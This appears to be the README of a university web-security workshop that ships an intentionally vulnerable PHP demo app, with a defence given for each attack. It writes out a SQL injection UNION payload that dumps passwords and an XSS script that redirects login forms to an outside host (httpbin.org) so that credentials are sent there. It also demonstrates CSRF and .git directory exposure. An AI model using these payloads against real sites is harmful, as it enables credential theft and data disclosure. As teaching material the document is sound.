DISCLAIMER: code in this demonstration are intentionally vulnerable. Do not use this code in your application!

Web Application Security Demo

Designed for students of KIV/WEB of University of West Bohemia

Older version of this workshop is available here

Presentation

Slides

Development

Requirements

• PHP >=7.1
• PHP extensions PDO and pdo_sqlite

Installation

Clone this repository git clone https://github.com/peoplepath/workshop-web-security.git or download ZIP file

Run

Inside downloaded project run

php -S 127.0.0.1:8080

Then goto http://127.0.0.1:8080/

Simulate attacks

SQL injection

• go to http://127.0.0.1:8080/sql-injection
• search for ' UNION SELECT name,password FROM user --
• observe disclosed password

Defense

Prepare statement

// prepare SQL statement on DB without arguments
$statement = $pdo->prepare($sql);

// send arguments separately (safely)
$statement->execute(['%' . $query . '%']);

// execute as normal
$users = $statement->fetchAll();

XSS

• goto http://127.0.0.1:8080/xss
• put following comment

❤️<script>
var form = document.querySelector('form');
form.setAttribute('action', 'https://httpbin.org/post');
form.setAttribute('target', '_blank');
</script>

• observe that all following backer are sending passwords to malicious server

Defense

escape your outputs

echo htmlspecialchars($comment);

CSRF

• goto http://127.0.0.1:8080/csrf
• login
• open http://127.0.0.1:8080/kittens.php
• go back to http://127.0.0.1:8080/csrf
• observe that new order was created under your login

Defense

use $_POST for request which modifies data

// verify CSRF token send with form is valid
if ($_SESSION['csrf'] !== $_POST['csrf']) {
    http_response_code(403);
    exit;
}

// generate CSRF token for the next request
$_SESSION['csrf'] = bin2hex(random_bytes(16));

Directory traversal

• todo http://127.0.0.1:8080/.git/HEAD
• observe that you have complete access to .git folder therefore to all files

Defense

• build application without .git
• separate public content (images, styles, etc.)
• adjust configuration of your web server, eg.

# denied all files
<RequireAll>
    Require all denied
</RequireAll>

# whitelist only *.php and other files
<Directory "public">
    <FilesMatch "((^$)|(^.+\.(css|map|js)$))">
        Require all granted
    </FilesMatch>
</Directory>

Weak hash algorithm

• obtain password hashes by SQL injection attack
• crack passwords by arbitrary online cracker (Rainbow table)

Resources

• Full list of attacks
• Twitter
  • Michal Špaček @spazef0rze
  • Vladimír Smitka @smitka

XSS (Cross-site Scripting)

• Content Security Policy
• OWASP XSS
• OWASP testing for XSS
• PHP triky: Cross Site Scripting (czech only)

HTTP Headers

• X-XSS-Protection
• Content-Security-Policy

SQL injection

• OWASP SQL injection
• Soom: SQL Injection (Full Paper) (czech only)
• PHP triky: Obrana proti SQL Injection (czech only)

CSFR (Cross-Site Request Forgery)

• OWASP CSFR
• Soom (czech only)
• PHP triky: Cross-Site Request Forgery (czech only)
• Co je Cross-Site Request Forgery a jak se mu bránit (czech only)

Path (Directory) Traversal

• OWASP Path Traversal

Others

• Self tweeting tweet
• XSS in Avast Desktop AntiVirus
• JWT vulnerabilities (eg. Key injection)